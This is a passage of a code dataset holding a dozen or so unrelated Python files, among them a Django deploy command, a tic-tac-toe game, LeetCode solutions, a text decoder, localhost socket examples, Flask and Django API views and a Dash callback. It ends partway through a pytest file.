#plt.title('Negative Log Likelihood Loss on Training Data as a Function of Epochs')\n #plt.savefig(\"fl_training_loss.png\")\n #print 'Plot saved as \"fl_training_loss.png\"'\n\n #plt.figure(2)\n #plt.plot(epochs, fl_accv1, '-b', label='4-layer w/ sigmoid activation')\n #plt.plot(epochs, accv1, '-r', label='3-layer w/ sigmoid activaction')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Accuracy (Percentage)')\n #plt.title('Classifier Accuracy on Validation Data as a Function of Epochs')\n #plt.savefig(\"fl_accuracy.png\")\n #print 'Plot saved as \"fl_accuracy.png\"'\n\n print(\"Results of validation on testing set with four-layer net:\")\n lossv, accv = [], []\n mlp.validate(lossv, accv, four_layer_model, test_loader)\n\n print(\"Results of validation on testing set with three-layer net:\")\n lossv, accv = [], []\n mlp.validate(lossv, accv, three_layer_model, test_loader)\n\n \n","sub_path":"src/assignment_3/mlp_four_layer.py","file_name":"mlp_four_layer.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272696028","text":"import os\nimport signal\nimport sys\nimport time\nfrom optparse import make_option\nfrom subprocess import Popen\n\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n\n # I'd like to use --application and --version, but --version is already\n # included in BaseCommand.option_list, and for being consistent, I'm\n # using app-id and app-version\n option_list = BaseCommand.option_list + (\n make_option('--app-id', '-A', dest='application', default=None,\n help='Set the application, overriding the application value from app.yaml file.'),\n make_option('--app-version', '-V', dest='version', default=None,\n help='Set the (major) version, overriding the version value from app.yaml file.'),\n )\n help = \"Deploy your application into Google App Engine\"\n\n def handle(self, *args, **options):\n shutdown_message = options.get('shutdown_message', '')\n application = options.get('application')\n version = options.get('version')\n\n from djangae.boot import setup_paths, find_project_root\n setup_paths()\n\n project_root = find_project_root()\n\n expected_path = os.path.join(project_root, \"app.yaml\")\n if not os.path.exists(expected_path):\n sys.stderr.write(\"Unable to find app.yaml at '%s'\\n\" % expected_path)\n sys.exit(1)\n\n # Will have been set by setup_paths\n sdk_path = os.environ['APP_ENGINE_SDK']\n\n appcfg = os.path.join(sdk_path, \"appcfg.py\")\n\n # very simple for now, only runs appcfg.py update . and some\n # extra parameters like app id or version\n\n command = [\n appcfg,\n \"update\",\n project_root\n ]\n\n if application:\n command += [\"-A\", application]\n if version:\n command += [\"-V\", version]\n\n process = Popen(\n command,\n stdout=sys.__stdout__,\n stderr=sys.__stderr__,\n cwd=project_root\n )\n\n try:\n process.wait()\n except KeyboardInterrupt:\n #Tell the dev appserver to shutdown and forcibly kill\n #if it takes too long\n process.send_signal(signal.SIGTERM)\n time.sleep(2)\n process.kill()\n\n if shutdown_message:\n sys.stdout.write(shutdown_message)\n\n sys.exit(process.returncode)\n","sub_path":"djangae/management/commands/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368817890","text":"import random\n\nboard = [[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"]] # Assigns an empty board \nturn = \"X\" # Sets the initial player/turn to X\n\ndef print_board():\n \"\"\"\n Prints out the board to the console.\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n for i in range(3):\n for y in range(3):\n print(board[y][i], end=\" \")\n print(\"\\n\")\n\ndef switch_turns():\n \"\"\"\n Sets global variable 'turn' from either X to O or the other way around\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n global turn\n if turn == \"X\":\n nextTurn = \"O\"\n else:\n nextTurn = \"X\"\n turn = nextTurn\n\ndef convert_from_numpad(num):\n \"\"\"\n Converts an integer, ranging from 1 to 9, into a useable position on the board. Ex: The integer '7' would output the position [0,0], ie. the top left position on the board, since '7' is the top left number on a numpad.\n\n Argument(s):\n num -- the integer to be converted into a position\n\n Output: \n A list consisting of two integers, both ranging from 0 to 2. \n \"\"\"\n position = [0,0]\n\n if num == 7 or num == 8 or num == 9:\n position[1] = 0\n elif num == 4 or num == 5 or num == 6:\n position[1] = 1\n elif num == 1 or num == 2 or num == 3:\n position[1] = 2\n\n if num == 7 or num == 4 or num == 1:\n position[0] = 0\n elif num == 8 or num == 5 or num == 2:\n position[0] = 1\n elif num == 9 or num == 6 or num == 3:\n position[0] = 2\n\n return position\n\ndef update_board(position, turn):\n \"\"\"\n Updates the board.\n\n Argument(s):\n position -- a list consisting of two integers, ranging from 0 to 2; the position on the board that is going to be updated\n turn -- a string; either 'X' or 'O'; the string to place on the board\n\n Output:\n None\n \"\"\"\n board[position[0]][position[1]] = turn\n\ndef check_availability(position):\n \"\"\"\n Evaluates whether a specified position on the board is empty or not.\n\n Argument(s):\n position -- a list consisting of two integers, ranging from 0 to 2; the position to evaluate if empty or not\n\n Output:\n Returns True if the position is empty and False if not.\n \"\"\"\n if board[position[0]][position[1]] == \"-\":\n return True\n else:\n return False\n\ndef check_for_win(localBoard, lastPosition, turn):\n \"\"\"\n Evaluates whether a specified board contains a row of three marks of the same kind or not.\n\n Argument(s):\n localBoard -- a list consisting of three separate lists, which in turn are consisting of three strings, either '-', 'X' or 'O'; the board to evaluate a win on\n lastPosition -- a list consisting of two integers, ranging from 0 to 2; the last position that was placed on the board\n turn -- a string, either 'X' or 'O'; the type of the last placed mark\n\n Output:\n Returns True if there is a row with three marks of the same kind and False if not.\n \"\"\"\n \n # Looks for a win on the horizontal row connected to variable lastPosition\n inRow = 0\n for i in range(3):\n if str(localBoard[i][lastPosition[1]]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n # Looks for a win on the vertical row connected to variable lastPosition\n inRow = 0\n for i in range(3):\n if str(localBoard[lastPosition[0]][i]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n # Looks for a win on the diagonal row going downwards \n inRow = 0\n for i in range(3):\n if str(localBoard[i][i]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n # Looks for a win on the diagonal row going upwards\n inRow = 0\n for i,j in zip(range(2,-1,-1),range(3)):\n if str(localBoard[i][j]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n return False # Returns False if none of the above if statements are true\n\ndef check_for_draw():\n \"\"\"\n Evaluates if no position on the board is empty or not.\n\n Argument(s):\n None\n\n Output:\n Returns True if the whole board is filled and False if not.\n \"\"\"\n for i in range(3):\n for j in range(3):\n if board[i][j] == \"-\":\n return False\n return True\n\ndef find_possible_win():\n \"\"\"\n Finds one or multiple rows on the board that is empty, except for one 'O'.\n\n Argument(s):\n None\n\n Output:\n Returns None if no rows meet the criteria or a list consisting of the rows that meet the criteria. Those rows are lists consisting of the two empty positions in the row. The positions are lists consisting of two integers, ranging from 0 to 2.\n \"\"\"\n rowList = [] # List of all rows that meet the criteria\n \n # Looks for vertical rows meeting the criteria, and appends them to rowList if they do\n for i in range(3):\n OPos = 0\n emptyPos = 0\n validRow = []\n for j in range(3):\n if board[i][j] == \"O\":\n OPos += 1\n elif board[i][j] == \"-\":\n emptyPos += 1\n validRow.append([i,j])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n # Looks for horizontal rows meeting the criteria, and appends them to rowList if they do\n for i in range(3):\n OPos = 0\n emptyPos = 0\n validRow = []\n for j in range(3):\n if board[j][i] == \"O\":\n OPos += 1\n elif board[j][i] == \"-\":\n emptyPos += 1\n validRow.append([j,i])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n # Evaluates whether the diagonal row going downwards meets the criteria or not, and appends it to rowList if it does\n OPos = 0\n emptyPos = 0\n validRow = []\n for i in range(3):\n if board[i][i] == \"O\":\n OPos += 1\n elif board[i][i] == \"-\":\n emptyPos += 1\n validRow.append([i,i])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n # Evaluates whether the diagonal row going upwards meets the criteria or not, and appends it to the rowList if it does\n OPos = 0\n emptyPos = 0\n validRow = []\n for i, j in zip(range(2, -1, -1), range(3)):\n if board[i][j] == \"O\":\n OPos += 1\n elif board[i][j] == \"-\":\n emptyPos += 1\n validRow.append([i,j])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n if len(rowList) > 0:\n return rowList\n else:\n return None\n\ndef try_positions(type):\n \"\"\"\n Evaluates whether there is a position on the board where a placement there would result in a win or not\n\n Argument(s):\n type -- a string, either 'X' or 'O'; the type of mark to locally place on the board to check for a win\n\n Output:\n Returns a list consisting of two integers, ranging from 0 to 2, if a position meeting the criteria exists, and None if not. \n \"\"\"\n for i in range(3):\n for j in range(3):\n if check_availability([i,j]):\n localBoard = [board[0][:], board[1][:], board[2][:]]\n localBoard[i][j] = type\n if check_for_win(localBoard, [i,j], type):\n return [i,j]\n return None\n\ndef computers_turn():\n \"\"\"\n Finds the position on the board where it makes most sense for the computer to place on, based on a set of priority rules.\n\n Argument(s):\n None\n \n Output:\n Returns a list consisting of two integers, ranging from 0 to 2; the position that meets the criteria.\n \"\"\"\n # Looks for a position where a placement would result in a win for the computer and, if found, returns it\n posO = try_positions(\"O\")\n if posO != None:\n return posO\n\n # Looks for a position where a placement would result in a win for the player and, if found, returns it\n posX = try_positions(\"X\")\n if posX != None:\n return posX\n\n # Looks for a row the computer could place on and win in a later turn and, if found, returns a random position from it\n rowList = find_possible_win()\n if rowList != None:\n row = random.choice(rowList)\n return random.choice(row)\n else:\n # Finds a random available position on the board and returns it\n while True:\n y = random.randrange(3)\n x = random.randrange(3)\n if check_availability([x,y]):\n return [x,y]\n\ndef players_turn():\n \"\"\"\n Gets the position the player wants to place on.\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n while True:\n try:\n i = int(input())\n except:\n print(\"Please enter an integer between 1 and 9\")\n continue\n else:\n position = convert_from_numpad(int(i))\n if int(i)< 1 or int(i) > 9:\n print(\"Please enter an integer between 1 and 9\")\n elif not check_availability(position):\n print(\"Cannot place at that position\")\n else:\n break\n return position\n\ndef play_game():\n \"\"\"\n Plays a full game of player versus player.\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n while True:\n print_board()\n print(\"Turn:\", turn)\n position = players_turn()\n update_board(position, turn)\n if check_for_win(board, position, turn):\n print_board()\n print(turn, \"wins\")\n return None\n elif check_for_draw():\n print_board()\n print(\"Draw\", \"\\n\")\n return None\n switch_turns()\n\ndef play_game_against_computer():\n \"\"\"\n Plays a full game of player versus computer.\n\n Argument(s):\n None\n\n Output:\n Returns None after a win or a draw.\n \"\"\"\n while True:\n if turn == \"X\": # If it's the player's turn, do the following\n print_board()\n print(\"Your turn\")\n position = players_turn()\n update_board(position, turn)\n if check_for_win(board, position, turn):\n print_board()\n print(\"You win\")\n return None\n elif check_for_draw():\n print_board()\n print(\"Draw\", \"\\n\")\n return None\n switch_turns()\n else: # If it's the computer's turn, do the following\n position = computers_turn()\n update_board(position, turn)\n if check_for_win(board, position, turn):\n print_board()\n print(\"The computer wins\")\n return None\n elif check_for_draw():\n print_board()\n print(\"Draw\", \"\\n\")\n return None\n switch_turns()\n print(\"Draw\")\n\ndef main():\n \"\"\"\n Acts as the 'main menu' that let's the player choose to play against the computer or not, and who should start. After a full game the player get's the choice to play again or exit the program.\n\n Argument(s):\n None\n\n Output:\n Returns None if the player chooses to not play again after a full game\n \"\"\"\n global board, turn\n while True:\n i = input(\"Do you want to play against the computer? y/n \")\n if i == \"y\":\n while True:\n i = input(\"Do you want to start? y/n \")\n if i == \"y\":\n play_game_against_computer()\n break\n elif i == \"n\":\n switch_turns()\n play_game_against_computer()\n break\n else:\n print(\"Invalid input, try again\")\n elif i == \"n\":\n while True:\n i = input(\"Do you want X to start? y/n \")\n if i == \"y\":\n play_game()\n break\n elif i == \"n\":\n switch_turns()\n play_game()\n break\n else:\n print(\"Invalid input, try again\")\n else:\n print(\"Invalid input, try again\")\n continue\n \n # This loop triggers after a full game has been played\n while True:\n i = input(\"Do you want to play again? y/n \")\n if i == \"y\":\n board = [[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"]]\n turn = \"X\"\n break\n elif i == \"n\":\n return None\n else:\n print(\"Invalid input, try again\")\n\nmain()","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"226673997","text":"# Plot the difference between LUX fields w/ and w/o metal parts\nimport pylab as pl\nimport numpy as np\nimport cPickle as pickle\n\nf1_name = './LUXline_data/luxLine_field.txt'\nf2_name = './LUXline_data/luxLine_bottomGrid.txt'\n#f1_name = 'LUXline_data/test.txt'\n\nheader = 9\ndata1 = np.genfromtxt(f1_name, delimiter = '', skip_header = header)\ndata2 = np.genfromtxt(f2_name, delimiter = '', skip_header = header)\ndata1 = np.asarray(data1.T) #take a transpose - x = data[0] and y = data[1]\ndata2 = np.asarray(data2.T)\n\ndel_in = []\nfor index, item in enumerate(data1[2]):\n\tif item > 0:\n\t\tdel_in.append(index)\nx1 = np.delete(data1[0], del_in)\ny1 = np.delete(data1[1], del_in)\nz1 = np.delete(data1[2], del_in)\nfield1 = np.delete(data1[3], del_in)\n\nfield_diff = field1 - data2[3]\ndel_in = []\n\nfor index, item in enumerate(field1):\n\tif np.isnan(item) == True:\n\t\tdel_in.append(index)\n\ndiff = np.delete(field_diff, del_in)\nx = np.delete(data2[0], del_in)\ny = np.delete(data2[1], del_in)\nz = np.delete(data2[2], del_in)\n\nwith open ('./LUXline_data/luxLine_fieldDiff_bottomGrid.pkl', 'w') as out:\n\tpickle.dump(x, out, -1)\n\tpickle.dump(y, out, -1)\n\tpickle.dump(z, out, -1)\n\tpickle.dump(diff, out, -1)","sub_path":"field_diff.py","file_name":"field_diff.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"469461369","text":"class Solution:\n def flipAndInvertImage(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n # horizon\n for i in A:\n i = i.reverse()\n # inverting\n result = []\n for i in A:\n res = []\n for j in i:\n res.append(1 if j == 0 else 0)\n result.append(res)\n return result","sub_path":"Leetcode/832-flipping-an-image.py","file_name":"832-flipping-an-image.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311710976","text":"def maxProfitAssignment(self, difficulty, profit, workers):\n n = len(difficulty)\n i = result = best = 0\n\n jobs = zip(difficulty, profit)\n jobs.sort()\n workers.sort()\n\n for skill in workers:\n while i < n and skill >= jobs[i][0]:\n best = max(best, jobs[i][1])\n i += 1\n\n result += best\n\n return result","sub_path":"MostProfitAssigningWork.py","file_name":"MostProfitAssigningWork.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244377058","text":"'''\nFind the minimum depth of a Binary tree\n'''\n# class TreeNode(object):\n# def __init__(self, val):\n# self.val = val\n# self.left = left\n# self.right = right\ndef Solution(object):\n #iterative approach\n def minDepth(self, root):\n if not root: return 0\n stack = [(root, 1)]\n while stack:\n item = stack.pop(0)\n if not item[0]: continue\n if not item[0].left and not item[0].right: item[1]\n else:\n stack.append((item[0].left,item[1]+1))\n stack.append((item[0].right,item[1]+1))\n\n #recurssive approach\n def minDepth(self, root):\n if not root: return 0\n d = map(self.minDepth, (root.left, root.right))\n return 1 + (min(d) or max(d))\n\n #recurssive approach2\n def minDepth(self, root):\n if not root: return 0\n if not root.left or not root.right :\n return max(self.minDepth(root.left), self.minDepth(root.right)) +1\n else:\n return min(self.minDepth(root.left), self.minDepth(root.right))+1\n","sub_path":"Trees/Minimum_Depth_BTree_111.py","file_name":"Minimum_Depth_BTree_111.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"45517323","text":"import re\nfrom typing import Union\n\nfrom .exceptions import SeparatorPositionException, SeparatorsNumberException\nfrom .settings import SEPARATOR\n\n\nclass Decoder:\n \"\"\"Decorder class\n Prepared for decoding text encoded by WeirdText encoder.\n \"\"\"\n\n def decode(self, encoded_text: str) -> str:\n \"\"\"Method decoding encoded text by WeirdText encoder.\n Args:\n encoded_text: Text to decoded.\n Returns:\n Decoded string.\n \"\"\"\n text, words_list = self._preprocess_raw_text(encoded_text)\n # regex for finding words longer than 3 - only this words could be encoded\n words_regex = re.compile(r\"[\\w+]{4,}\", re.U)\n\n # iterating through all encoded words to replace them with decoded ones\n for word in words_regex.finditer(text):\n start, end = word.span()\n current_encoded = text[start:end]\n\n # finding matching word from list to replace encoded one\n for i in range(len(words_list)):\n current_word = words_list[i]\n\n if self._is_valid_replacement(current_encoded, current_word):\n # replacing encoded word in text with original one\n text = text[:start] + current_word + text[end:]\n # removing word from list as it is no more needed\n del words_list[i]\n break\n\n return text\n\n def _preprocess_raw_text(self, text: str) -> Union[str, list]:\n \"\"\"Method preprocessing raw text passed to decoder.\n\n First text will be validated by checking number of separators\n and position of first one found. Than raw text will be split\n into encoded sentence (only) and list of original words.\n Args:\n text: Raw text to preprocess.\n Returns:\n Encoded sentence (only) and list of original words.\n \"\"\"\n found_separators = re.finditer(SEPARATOR, text)\n\n separator_list = [x for x in found_separators]\n\n if len(separator_list) != 2:\n raise SeparatorsNumberException(\n \"Encoded text does not have two separators.\"\n )\n\n if separator_list[0].span()[0] != 0:\n raise SeparatorPositionException(\n \"Encoded text does not begin with proper separator.\"\n )\n\n return text[separator_list[0].span()[1] : separator_list[1].span()[0]], text[\n separator_list[1].span()[1] :\n ].split(\" \")\n\n def _is_permutation(self, word: str, pattern: str) -> bool:\n \"\"\"Method checking if word characters are permutation of pattern.\n\n There are two dictionaries having characters of words as keys and\n number of occurrences in word as values. If they are the same words\n are permutation of each other.\n Args:\n word: Base word.\n pattern: Pattern to compare base word with.\n Returns:\n Information if word is permutation of pattern.\n \"\"\"\n return self._prepare_counting_dict(word) == self._prepare_counting_dict(pattern)\n\n def _prepare_counting_dict(self, word: str) -> dict:\n \"\"\"Method generating dictionary from word.\n\n Each character is set as key and number of its occurrences is\n value.\n Args:\n word: Word to generate dictionary.\n Returns:\n Dictionary generated from word.\n \"\"\"\n word_dict = {}\n for char in word:\n word_dict[char] = word_dict.setdefault(char, 0) + 1\n return word_dict\n\n def _is_valid_replacement(self, encoded_word: str, current_word: str) -> bool:\n \"\"\"Method checking if encoded word should be replaced with current word from list.\n\n Each character is set as key and number of its occurrences is\n value.\n Args:\n encoded_word: Encoded word from sentence.\n current_word: Potential replacement from list.\n Returns:\n Information if current_word is proper replacement for encoded_word.\n \"\"\"\n return (\n len(current_word) == len(encoded_word)\n and encoded_word[0] == current_word[0]\n and encoded_word[-1] == current_word[-1]\n and self._is_permutation(encoded_word[-1:1], current_word[-1:1])\n )\n","sub_path":"weirdtextapi/textprocessing/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"643029798","text":"from socket import *\r\nimport time\r\nimport numpy as np\r\nimport struct\r\nfrom PyQt5.QtCore import QThread\r\n\r\ndef server():\r\n\r\n host = \"127.0.0.1\"\r\n port = 12345\r\n\r\n serverSocket = socket(AF_INET, SOCK_STREAM)\r\n serverSocket.bind((host, port))\r\n serverSocket.listen(1)\r\n print(\"Waiting for client\")\r\n\r\n connectionSocket, addr = serverSocket.accept()\r\n print('connection in', str(connectionSocket))\r\n\r\n f1 = 35 # frequency 1 (Hz)\r\n f2 = 10 # frequency 2 (Hz)\r\n\r\n start = time.time()\r\n i = 0\r\n \r\n while True:\r\n # time\r\n now_time = time.time() - start\r\n\r\n # original signal\r\n signal = 0.6 * np.sin(2 * np.pi * f1 * now_time) + 3 * np.cos(2 * np.pi * f2 * now_time + np.pi/2) # 복잡한 신호\r\n # signal = np.sin(2 * np.pi * f2 * now_time) # 간단한 신호\r\n\r\n time.sleep(0.01)\r\n\r\n data = str(now_time) + ' ' + str(signal) + '\\n'\r\n\r\n connectionSocket.send(data.encode('utf-8'))\r\n\r\n i += 1\r\n\r\n serverSocket.close()\r\n\r\n\r\nserver()","sub_path":"measurement/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"334963880","text":"\"\"\"Handle requests made on reviews\"\"\"\nimport os\nfrom api import create_app, db\n\n@app.route('/api/v2/businesses//reviews',\n methods=['POST'])\n@check_json\n@token_required\n@check_for_login\ndef add_review_for(current_user, content, business_id):\n \"\"\"Add a review for a business.\"\"\"\n message = validator.validate(content, 'review_reg')\n if message:\n return jsonify(message), 400\n to_review = Business.query.filter_by(id=business_id).first()\n if not to_review:\n return jsonify({'msg': 'Business id is incorrect'}), 400\n if to_review.business_owner == current_user.username:\n return jsonify({'msg': 'Reviewing own business not allowed'}), 400\n review = Review(rating=int(str(content['rating']).strip()),\n body=content['body'].strip(),\n owner=current_user,\n review_for=to_review)\n db.session.add(review)\n db.session.commit()\n message = {'msg': 'Review for business id {} by user {} created'.format(\n review.business_id, review.review_owner),\n 'details': {'rating': review.rating,\n 'body': review.body}}\n return jsonify(message), 201\n\n\n@app.route('/api/v2/businesses//reviews',\n methods=['GET'])\ndef get_reviews_for(business_id):\n \"\"\"Retrieve all reviews for a single business.\"\"\"\n business = Business.query.filter_by(id=business_id).first()\n if not business:\n return jsonify({'msg': 'Business id is incorrect'}), 400\n reviews = Review.query.filter_by(business_id=business_id)\n if not reviews.count():\n return jsonify({'msg': 'No reviews for this business'}), 400\n message = {'reviews': [{'rating': review.rating,\n 'body': review.body,\n 'review_by': review.review_owner}\n for review in reviews],\n 'business_id': business.id,\n 'business_owner': business.business_owner}\n return jsonify(message), 200\n","sub_path":"api/routes/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"476954449","text":"# File name: feet_to_meters\n# Name: Kit Wei Min\n# Description: Converts length from feet to meters\n\n# Prompts for the length in feet\nfeet = float(input(\"Length in feet = \"))\n\n# Converts feet to meters\nmeter = feet * 0.305\n\n# Displays result\nprint(\"Length in meters = {0:<10.3f}\".format(meter))\n","sub_path":"Practical 1/Practical 1(complete)/Practical 1/kitwm_p01q03.py","file_name":"kitwm_p01q03.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"300795270","text":"import matplotlib.pyplot as plt\n\nX = [3,6,9,12,15,18,21,24,27]\nY = [55000,66300,77500,83000,83200,83500,68500,60000,80500]\n\nplt.plot(X,Y,marker='o')\nplt.title(\"Sentiment Analysis\")\nplt.xlabel('Time (in mins)')\naxes = plt.gca()\naxes.set_xlim([0,30])\nplt.ylabel('Number of tweets processed')\nplt.show()\n\n# total = 0\n# for x in Y:\n# \ttotal = total + x\n\n# result = float(total/(27*60.0))\n# print result\n","sub_path":"ds256-a2/Plots/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"503033352","text":"import random\nfrom django.conf import settings\nfrom django.http import HttpResponse, Http404, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.utils.http import is_safe_url\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view ,permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializers import *\nfrom .models import *\nfrom .forms import *\n\nALLOWED_HOSTS = settings.ALLOWED_HOSTS\n\n\n\ndef home(request):\n return render(request, \"pages/index.html\", status=200)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef tweet_create(request, *args, **kwargs):\n user = request.user\n serializer = TweetCreateSerializer(data=request.POST)\n if serializer.is_valid(raise_exception=True):\n data_chunk = serializer.save(user= user)\n return Response(serializer.data, status=201)\n return Response({},status=400)\n\n\n\n\n\n@api_view(['GET'])\ndef tweet_list(request):\n data_set = Tweets.objects.all()\n serializer = TweetSerializer(data_set, many=True)\n return Response(serializer.data)\n\n\n\n@api_view(['GET'])\ndef detail_view(request, tweet_id):\n data_set = Tweets.objects.filter(id=tweet_id)\n if not data_set.exists():\n return Response({}, status=404)\n data_set = data_set.first()\n serializer = TweetSerializer(data_set)\n return Response(serializer.data, status=200)\n\n\n\n@api_view([\"DELETE\", \"POST\"])\n@permission_classes([IsAuthenticated])\ndef delete_view(request, tweet_id):\n data_set = Tweets.objects.filter(id=tweet_id)\n if not data_set.exists():\n return Response({}, status=404)\n data_set = data_set.filter(user=request.user)\n if not data_set.exists():\n return Response({\"message\": \"error\"}, status=401)\n data = data_set.first()\n data.delete()\n return Response({\"message\": \"Tweet removed\"}, status=200)\n\n@api_view([\"POST\"])\ndef like_view(request,*args, **kwargs):\n \n serializer = TweetLikeSerializer(data=request.data)\n if serializer.is_valid(raise_exception = True):\n data = serializer.validated_data\n tweet_id = data.get(\"tweet_id\")\n action = data.get(\"action\")\n content = data.get(\"content\")\n data_set = Tweets.objects.filter(id=tweet_id)\n if not data_set.exists():\n return Response({}, status=404)\n data = data_set.first()\n if action == \"like\":\n data.likes.add(request.user)\n serializer = TweetSerializer(data)\n return Response(serializer.data, status=200)\n elif action == \"unlike\":\n data.likes.remove(request.user)\n elif action == \"retweet\": \n new_tweet = Tweets.objects.create(user = request.user, parent=data,content= content)\n serializer = TweetSerializer(new_tweet)\n return Response(serializer.data, status=200)\n return Response({}, status=200)","sub_path":"tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"541447025","text":"import dash_html_components as html\nimport feffery_antd_components as fac\nfrom dash.dependencies import Input, Output\n\nfrom server import app\n\n\n@app.callback(\n Output('tree-demo-output', 'children'),\n [Input('tree-demo', 'selectedKeys'),\n Input('tree-demo', 'checkedKeys')],\n prevent_initial_call=True\n)\ndef tree_callback_demo(selectedKeys, checkedKeys):\n import time;time.sleep(1)\n\n return [\n fac.AntdTitle('selectedKeys:', level=5),\n html.Pre(str(selectedKeys)),\n\n fac.AntdTitle('checkedKeys:', level=5),\n html.Pre(str(checkedKeys))\n ]\n","sub_path":"callbacks/AntdTree.py","file_name":"AntdTree.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"458960810","text":"g=int(input())\nflag=0\nif(g>2):\n for i in range(2,int(g/2)+1):\n if g%i==0:\n print(\"yes\")\n flag=1\n break\nif flag==0 or g==2:\n print(\"no\")\n","sub_path":"comp.py","file_name":"comp.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467690826","text":"import socket\nfrom time import sleep\nimport sys\n\nHOST, PORT = \"localhost\", 3288\ndata = \"hello\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n sock.connect((HOST, PORT))\n while 1:\n try:\n print(\"Enter:\")\n line = sys.stdin.readline()\n except KeyboardInterrupt:\n break\n\n if not line:\n break\n\n sock.send(bytes(line + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\nfinally:\n sock.close()\n\n\"\"\"\nsame as:\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n\n sock.connect((HOST, PORT))\n sock.send(bytes(data + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\n sleep(3)\n sock.send(bytes(data + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\n sleep(3)\n sock.send(bytes(data + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\n\n\"\"\"\n","sub_path":"io/client_3.py","file_name":"client_3.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"536905589","text":"from setuptools import setup, find_packages\n\ntry: \n\tlong_desc = open('README.md').read()\nexcept:\n\tlong_desc = ''\nsetup(\n\tname = \"saveb\",\n\turl = \"https://github.com/jdavidd/download\",\n\tauthor = \"Jitca David\",\n\tauthor_email = \"j@yahoo.com\",\n\tversion = \"0.0.5\",\n\tpackages = find_packages(),\n\tinstall_requires = [\n\t \"saveapi==0.0.3\",\n\t \"jupyter==1\",\n\t \"argparse==1.1\"\n\t \"msgpack==0.5.6\",\n\t],\n\tinclude_package_data=True,\n\tdescription=\"A button\",\n\tlong_description=long_desc,\n\t \n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"600585015","text":"import pytest\nimport yaml\nfrom click.testing import CliRunner\nfrom mock import MagicMock\nfrom aws_ami_creator.cli import *\n\n\ndef test_get_user_data_script():\n get_user_data_script('', {'init_scripts': []}, {})\n\n\ndef test_prepare_template_vars():\n prepare_template_vars(['a=1'], {'vars': {'a': 'some var'}})\n\n\ndef test_print_version():\n runner = CliRunner()\n\n with runner.isolated_filesystem():\n result = runner.invoke(cli, ['--version'], catch_exceptions=False)\n\n assert 'AWS AMI Creator' in result.output\n assert result.exit_code == 0\n\n\ndef test_create(monkeypatch):\n\n 